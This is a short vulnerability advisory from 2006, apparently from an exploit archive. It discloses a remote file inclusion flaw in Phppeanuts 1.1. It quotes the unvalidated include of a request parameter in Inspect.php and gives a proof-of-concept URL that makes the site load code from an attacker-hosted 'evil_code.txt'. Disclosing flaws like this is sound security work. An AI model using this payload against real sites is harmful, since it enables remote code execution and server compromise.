Home / exploits phppeanuts-rfi.txt
Posted on 16 November 2006
.:: Preface ::. Type : Remote File Include Scripts : Phppeanuts 1.1 Download : http://scripts.ringsworld.com/development-tools/phppeanuts-1-1.zip Founder : Hidayat Sagita aka bomm_3x Contact : hidayat.sagita[at]gmail[dot]com .:: What ? ::. In Inspect.php file on line : 4. if ( isSet($_REQUEST["Include"]) ) 5. include $_REQUEST["Include"]; Variable "Include" not verified first before being used. .:: Proof Of Concept ::. http://site/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://yoursite/evil_code.txt ? .:: Shoutz ::. eCHo staff, az001 and All newbz.